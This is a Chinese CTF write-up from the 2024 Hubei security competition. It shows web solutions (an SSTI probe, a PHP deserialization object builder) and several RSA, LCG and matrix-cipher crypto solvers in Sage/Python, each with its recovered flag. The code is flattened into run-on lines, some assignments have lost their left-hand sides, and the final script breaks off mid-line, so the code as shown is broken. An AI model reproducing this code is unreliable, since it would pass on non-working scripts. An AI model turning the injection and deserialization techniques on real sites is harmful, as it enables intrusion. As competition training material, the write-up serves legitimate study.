本文来自:天权信安网络安全生态圈
作者:天权信安网络安全团队
2024年湖北省网络与数据安全实践能力竞赛
——天权信安WriteUp
✦✦✦
解题过程
WEB.01
✦✦✦ 1.速算比赛
直接禁用JS 手动计算30次得到flag
操作内容:
WEB.02
✦✦✦ 2.Sal的图集
操作内容:
回显是4,Search处有ssti漏洞
代码:
/search?name={{2*2}}
WEB.03
✦✦✦ 3.popmart
操作内容:
代码:
class popmart{public $yuki;public $molly;public $dimoo;public function __construct(){$this->yuki='tell me where';$this->molly='dont_tell_you';$this->dimoo="you_can_guess";}public function __wakeup(){global $flag;global $where_you_go;$this->yuki=$where_you_go;if($this->molly === $this->yuki){echo $flag;}}}$exploit = new popmart();$serialized_exploit = serialize($exploit);echo $serialized_exploit;
CRYPTO.01
✦✦✦4 Mypow
操作内容:
参考链接:
https://blog.csdn.net/luochen2436/article/details/132138412
代码:
题目:+from Crypto.Util.number import *from gmpy2 import *import osflag = b'xxx'def Mypow(b, e, mod):a = 1while e:e >>= 1b = (b*b)%modif e&1:a = (a*b)%modreturn adef Genp(bit_length):coeff = 2 ** 5 * 3 * 7while True:tmp_prime = getRandomNBitInteger(bit_length - 10)p = coeff * tmp_prime + 1if is_prime(p):breakreturn pdef Genkeys(bit_length):p,q = Genp(bit_length),Genp(bit_length)n = p * qhint = (2 * p + 7 * q) % nreturn n, hintif __name__ == '__main__':e = next_prime(666)n, hint = Genkeys(512)m = bytes_to_long(os.urandom(30) + flag)ct = Mypow(m,e,n)print(f'n = {n}')print(f'hint = {hint}')print(f'ct = {ct}')'''n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000'''#sageR.<x> = Zmod()[]f = 2*x^2 + 7*n - hint*xp = int(f.roots()[0][0])q = n//pMypow(b,e,mod)函数相当于pow(m,e,n)函数,但是对于不同的幂e结果不同。当e为偶数时,相当于pow(m,e,n);当e为奇数时,相当于pow(m,e-1,n)。本题的e = next_prime(666),显然是一个素数(必然是奇数),因此真正的e = next_prime(666)-1。经计算,gcd(e,phi)=e,因此演变为有限域下开根问题。分别在 G F ( p ) , G F ( q ) GF(p),GF(q) GF(p),GF(q)上开e次方根,之后crt组合一下,求出所有的m,再判断字符串中是否含有DASCTF即可得到flag。#sageimport gmpy2from Crypto.Util.number import *n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000R.<x> = Zmod()[]f = 2*x^2 + 7*n - hint*xp = int(f.roots()[0][0])q = n//pe = gmpy2.next_prime(666)-1R.<x> = Zmod(p)[]f = x^e-ctf = f.monic()results1 = f.roots()R.<x> = Zmod(q)[]f = x^e-ctf = f.monic()results2 = f.roots()for i in results1:for j in results2:param1 = [int(i[0]),int(j[0])]param2 = [p,q]m = CRT_list(param1,param2)flag = long_to_bytes(int(m))if b'DASCTF' in flag:print(flag)break
flag值:
DASCTF{FastP0w3r_4nd_AMM_0f_R5A}
CRYPTO.02
✦✦✦5 easycrypto
操作内容:
参考链接:
https://blog.csdn.net/luochen2436/article/details/132964576
题目:
代码:
题目:from Crypto.Util.number import *from secret import FLAGm = bytes_to_long(FLAG)def getpq(nbit):p = getPrime(nbit)q = getPrime(nbit)if p > q:return p, qelse:return q, pq = getpq(512)P = (p - q) & ((1 << 130) - 1)n = p * qleak_p = p >> 256c = pow((1 + P * n), m, n ** 3)=', n)=', leak_p)=", c)# n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287# leak_p = 115314121469787984258489158421056136177545051135641551928888818017665807264468# c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779p高位泄露256bit,但是泄露的bit不够,我们还需要爆破8bit才能copper恢复p。#sagefrom tqdm import *n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287p_high = 115314121469787984258489158421056136177545051135641551928888818017665807264468c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779pbits=512for i in trange(2**8,1,-1):p4 = p_high<<8p4 = p4 + ikbits = pbits - p4.nbits()p4 = p4 << kbits= PolynomialRing(Zmod(n))f = x + p4roots = f.small_roots(X=2^kbits, beta=0.4, epsilon=0.01)if roots:p = p4+int(roots[0])if n%p==0:print(i,p)break#i = 197,p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343
计算得到P,接着二项式展开得到
解题代码:
import gmpy2from Crypto.Util.number import *n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343q = n//pP = (p - q) & ((1 << 130) - 1)m = (c-1)//n*gmpy2.invert(P,n) % nflag = long_to_bytes(m)print(flag)#DASCTF{365d0d2cda3a3836a19bf1f46760d875}
flag值:
DASCTF{365d0d2cda3a3836a19bf1f46760d875}
CRYPTO.03
✦✦✦
6 Another+leak+of+LCG
操作内容:此题为原题,找到了代码,发现代码跑不通,更改了一下代码,跑出结果。
种子恢复逻辑:从最后一轮开始,逐步逆推种子。每轮只使用非 * 的有效位,按低位在前构建整数。利用线性同余公式 (seed - b) * inverse(a, M) % M 逆推种子。
恢复 Flag:通过异或运算 flag = c ^ seed 恢复原始 flag,其中 c 是给定的密文。
解码 Flag:尝试不同编码(如 utf-8, latin1),检查是否全是ASCII字符,记录最佳解码结果。
解题公式
种子逆推公式:seed = (seed - b) * inverse(a, M) % M
Flag 恢复公式:flag = c ^ seed
代码:
from Crypto.Util.number import long_to_bytesc = 16881580266371213879199933551551391657843465997606963348664525781336437594162520786815349648165563542125219063481822246500499434326624995868766335675376062002958905249433093212a = 7048435472566573813031570507837890091364947084306630050544242220147807292350445564322172244244726206563452305566866223414437853917448623276909090327076693b = 9204853069421046007176344891235245198607052139715825810823076231566533652655127030214860066312526149219510111657539481375881111759200483396551737326166933x = ['**********************1*****************************************************************************0******************************************************************************************************************1*************************************************************************************1*********************************************0*********************************************************************************************************************************************************1**********', '**1**************************0*********************1************************************************************************************0**********************************************************************************************************************************1******************************0********************************0********************************1*****************************************************************************************************************************************0*********', '*************************************************************************************1*********************************1*********************************************************************1**********************************************************************************************************************************************************************0*******************************************************************************1******************************************1********************************', '**************************0**************************************************1***********************0******************************************************1*********************************************************************************************************************0*************************1***********************************************************1******************************************************************1*************0*****************************************************************1****', '******0******************************************************1*************0******************************1****1*********************************************1*******************************************************0*********************************************************************************1*****************************************0******************************************************1**********************************************************************1************************************************', '***********************************0******************1**********0*****************************************************************************************************************************************************0*******************************1************************************************************1**************0*************************************1**************************1***************************************************************************************0***********************************', '********************************00************************************************************************00************************************************************************************************************0*******************************0*0********1***********1*1***********1****0***********************************************************************************************************0*********************************************************************0******************************************0', '***************************0******************************************1****************0*************************1**********************0************************************************************************0*************************0***************0****************************0*******1***************1******************0*******************1**********************************************************************************************************************************************0****************0********', '**0********************************************************************************1************************1*************************************************************************1*************************1*************************1***************1*****************************************************************************************************************0**********************************01**************1********************************************************************************************0***', '**1*******************************************************************************1*********************************1******0*****************************************************************************************************1*********************************************************************************************1***************1********************************1*************************************0**0******************************************************************************************************', '********************************************************************************************************************************************************0********************************************0***0*************************************************************0*******1***********************0****************************1*********************************************************************************************0**********************************************0*******1**********************************0***', '***************************************************************************************************************************0**********************1*********0*********************************************************************************1*******0**********************************************************0*************************************************************************************************1************************************************************************************************************', '******************************************************************************************************0************1**0******************************1******************************************1****************************1******0*****************************************************************************************************************************************************0*******************0*********************0*******************************************************************************************', '****1************1***********************************************************************************************************1*****************************************************1***************************************************1**********************************************************************************************************************0*******************************0*****************0*************************1********************************************0*********0**0***1***********************', '******0************************************************************************0***************************************************************************************************************************************************************1**************************************************************************************************************************************************************1********************1********1**************************************************0******************0*************', '**********1********************************1*****************************************************************0*****************************************************************************************************************************************1***1***************0*******************1******************************************************************0****************************************01*****************************************************************************************************************0*', '**********1**************************************************************************************************************************************************************************************************************************************************************************************1******************0******************************************************************************************************************************************************************1****************************************', '**************************************************************************************************************************************0************************************************************0***************************************************************************************************************************************************************************************************0***********0**************************************************************0***************1*****************************', '*******************************************************0*********************************************************************************************************************************1****1****************************************************************0*******0*****************************************************************************************************************0***************0*******************************************************************************0**************************************', '*******11***********1*************************1****************************************************************************************************************************************************************************1******************0******************0************************************************************************************************0*****************1*****************************************************************************************************************************************0*', '******************************************************************1****************************************************************************************************0**************************************************1********************************************************************************************************************************************************************************************************************************************************0*******1***************************1********', '*******************0**************************************************0****************************************************1*************************************1*********************************************************************************************************************************************************0***************0*******0***************************************************0*******************************************************************************************************1**0*************', '********************1**********1*******************************0*********************11*************************************************************0*************************************************************************0******************************************************************0**********************************************************************************1***************0**1*****************1*********************************************************0********************************************', '*************************0********************************************************************************************************0**************01************0************************************************1*****************0**************0*********************1*********0************0*****************************************1***1**************************************************************************0**********************************************1************1********************************************', '*****************************************************************************1***************1*****1***********************************************************************************************************************0****************************************************************************************************1*************************0****************1*************************************************************************0**************************************************************************', '***************1**********1**********************************************************0***************************************************************************************************************0**************0**********1*******************************1*****************************************************************************************0**********************************************************************************************0******************************************************************0****', '***1*****************************************************************************************************0***************************************************************************************************************1**************************************************0***************0********************************************************1*******************************************1*****************************************************************************************************************0************', '*********************************************0*1***************************************************0****************************************************************************************************1********************************************************************************************************0*******************************0**************************************************0**********0***********1********************************************************************1**********************0***0***1', '************10*******************************************0**********************************1************************0****************************0*************************************************************************************************1***************************0****0*1**********************************************1******0*************************************************1********************************************************************************************************************************', '**************************************1*************0**************1*************1*****************0**********1****************************************************************************************************************************************************************************************************************************************************0********************1*******************0************************************************1***************1**************************************************', '**************************************************************************************************************1****************0*************************1****0******************************************0****************************************************************0***********************************************************************0*************************************************0**********************0**********************************************0**1**************************************************', '******************************************0************************************************************00***********************************************************************************************************************************1*************************************************************************************************************************************************************1***********************1**************************0******************************************************************', '******************************************************************************************************1*1***********0*************************************************************0********************************************************************************1*********************************0*******1********************************************************************************************1*****************************1*************************1*************************************1***********************', '**************0******0*************1*********0************************************1******************0**1****************************************************************************************************************************0*************1****************************1****************************************1***********************0*****************************************************************************0********0*1******************1**********************1*******************************************', '***************************1***************************************************************************************************1**********************************1******************************************1********************************************************************************************************************0*********11*****************************************************************************************************************************************************1****************************', '***********************************************************************************************************1*******************************1***********************1*****1**************************************************************************************************1**************0*******1*************************************1**********************************************************************************************************************************************1********************************1******', '***************************************************************0**0************************************0********************************************************************************************************0**************************1*********************************************1************************************************************************1***0*************************************************1************************************************1********1***************0********************1********', '*****************************************0**0******************0***************************************************************1*********1**1***************************************************1***********************************************0***************************0**********1********1*****************0*************************************************0***********************0**********************************1******************************************************************10****************************', '********************************************************************************************************************************************************************1****************************************************1****************************************************************************0***************************************************************************************************************************************0**********************************************************0**********************', '**********************************0**************************************************0*************************************0**********************************0**********************************************************************************0*****0***********************************************************0*************************************0***************************0******************************1*0*********************************************************************************************************', '**************************************************************************************************************1***0*********************0***************************0**************************1*****************1****************************************************************************************************************************************************************************************************************0************************0********************************************************************', '*****************************************************************1************************************0*****************************0*******************************************************0********************0*********************************************0***********************0*****0****************************************************************************0**********************0**1***************************************************************************************************************************', '**********************************************************1*****************1**************************************************************0****************************************************************1**************************************************************************************************************************************0*********************************************************************************************1******************************************************************************', '***************0***************************************************************************0************1***************1**************************************1************1**************************************************************************************************0*************************************************************************************************************************************1************************************************0*********************************************************', '*******************************************************************************************************************10**********************************************************************************************************************************1*******************0**********0**********1*****************************************************0******************************************************************************1***0*****************************************************************1*******************', '******************************00***********0**************************************************0***************************************************************************0************0*****************0****************************0******************************************************************************************************************************************************************************1***************0*****************************0******************0*****************************************', '*********************0*****************************************0*********************1****************1***************************10*************************1**********0***************************************************************************************************************************************************************1************0********************************************0*****************************************************************************************************************************', '***************************************************1*01*********************1***************************************1************************1*******0******************************************1*******************************************************************************0********************1**0*****0******************************************************************************************0*1********************************************************************************************************************', '***************************1*******************1*****************************************************************************************0*****************************************************************************************************************************0*****************************0*********************1*****1*************************0***************1******************1***********************************************************0******************************************0*1************************', '****************************1******************************************************************************0****************0**********************************************************************************************0**************************************************1********************************************************************************************************1***********************0***************************1*********************************0****************************0*********************', '*********************************************************1***************************************0**********************************************************0***************************1*******************************************************0*********************************************************************************************************************1***************************0****************************0*1**************0***************************0***************************************************', '**************************0******11*******************************************************************************0**********************************************************0****************************1**********0**********************************************************************************************************************************************************************************************************************************************************************************************************', '*******************1*****************************************************************************************************************************************************************************************0************************************************************************************1**********************************************************0*************0***************************************************************************************************1************************************************', '***************1***********************************0*********1********************0***********************1*************************************1*********************************************************************0***********************************************************************************************************************************************************************************************************************0***********************************************0*********************************', '****************************1**************************************************************************************************************************1*****0***************************************************************0**************************0*1************0****************************************0***********************************0*****************************************************************************************************************************************************0*********************', '*********************************************************************************************************0*********************************0*********************************1************00***0*******************************************************************************************1***************************************************************0************************************************************************************************1********************************11*******************************0*', '**1*******1************************************************************0*************************************************************************0*****************************************************0***************************************************************************************************************************************0***************************************************1***************************************************************0************************0***********************************', '***********************************************************************************************************************0*******************************************1*************************************1**************************************************************************************************************************0*******************************10*****************************************************************************1**********************************************0*****************************', '******************************************************************00*****************************************************************************************************************************************1****************************************************************************************************1***0******************************************0*************0*************************************************0*******0*****************************************************************1********************', '***************************************************************************************0**********1***1****0*****0*****************0********************************************************************************************************************************************************1***********0*****1***********1*****************************************************************************************************0*1*************************************0*******************************************************', '****************************************************************************************1***********************0********1*************1****************************************************************************************************************************************************************************************1***0*******1***************************0**********************0****************1************************************************************************************************************1**', '*********************************************************************************************************************0**************1******************************************************************************1********0****0********************************************1*******************************0******************1***************************************1*********************************************************0**********************************************************************1*********************', '********************0*************1*********************************************0*****************************************************************************************************************************************************1**********0**************************1******************************************************************1********************************************1*******************************************0****************************************************************************0**********', '*************************************************************************1***********************************************************0*************************************************************************1********************************0*************0*******************************************************************1**********************************************************************1********0*************************************************************************************************************']T = 64def gen(s, M):xx = []for _ in range(T):s = (a * s + b) % 2**Mxx.append(bin(s)[2:].zfill(512))return xxXX = []def check_seed(s, length, comparison_list):seed = int(s, 2)X = gen(seed, length)for i in range(length):for j in range(T):if comparison_list[j][-i-1] != "*" and comparison_list[j][-i-1] != X[j][-i-1]:return Falsereturn Truedef find_possible_seeds(prefix=""):if len(prefix) == 512:if check_seed(prefix, len(prefix), x):XX.append(int(prefix, 2))else:for bit in ('0', '1'):new_prefix = bit + prefixif check_seed(new_prefix, len(new_prefix), x):find_possible_seeds(new_prefix)XX = [] # 存储找到的有效种子find_possible_seeds()print(XX)for SEED in XX:print(long_to_bytes(c ^ SEED))
CRYPTO.04
✦✦✦ 7 QAQTAT
操作内容:
参考链接:
https://dexterjie.github.io/2024/12/01/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/2024%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A6%8F%E5%BB%BA%E7%9C%81%E6%95%B0%E6%8D%AE%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/#QAQTAT%E2%80%94%E2%80%94Unsolved
代码:
from Crypto.Util.number import *from hashlib import sha256from secret import flagm = bytes_to_long(flag)def enc(pt, G, A, T, S, p):s = randint(0,p-1)D = G^sE = A*T*AF = D*E*DK = list(D*S*D)key = sum(K[0])+sum(K[1])+sum(K[2])mask = int(sha256(str(key).encode()).hexdigest(),16)ct = pt ^^ maskreturn ct, Fdef dec(ct, Q, F, p):K = Q*F*Qkey = sum(K[0])+sum(K[1])+sum(K[2])mask = int(sha256(str(key).encode()).hexdigest(),16)pt = ct ^^ maskreturn ptp = getPrime(256)= GF(p^2, modulus=x^2+1)M = MatrixSpace(Fp2, 3, 3)while True:Q = M.random_element()A = M.random_element()if Q*A != A*Q:breakT = Q*A*QS = T*A*Tr1 = randint(0,p-1)G = Q^r1pk = (list(A), list(T), list(S), list(G))F = enc(m, G, A, T, S, p)= ",p)= ", pk)= ", list(F))= ", ct)"""p = 72887242108660141996862343556330151015969690949835567252527194788428065480383pk = ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), (57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), (6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])F = [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 12828201007038003022201361213007595366913298546122923089499182187938898042596)]ct = 96910798667771988374291172958072220832574586618080134344021393928577220469428"""step1from Crypto.Util.number import *from hashlib import sha256def enc(pt, G, A, T, S, p):s = randint(0,p-1)D = G^sE = A*T*AF = D*E*DK = list(D*S*D)key = sum(K[0])+sum(K[1])+sum(K[2])mask = int(sha256(str(key).encode()).hexdigest(),16)ct = pt ^^ maskreturn ct, Fp = 72887242108660141996862343556330151015969690949835567252527194788428065480383= GF(p^2, modulus=x^2+1)M = MatrixSpace(Fp2, 3, 3)pk = ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), (57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), (6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])F = [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 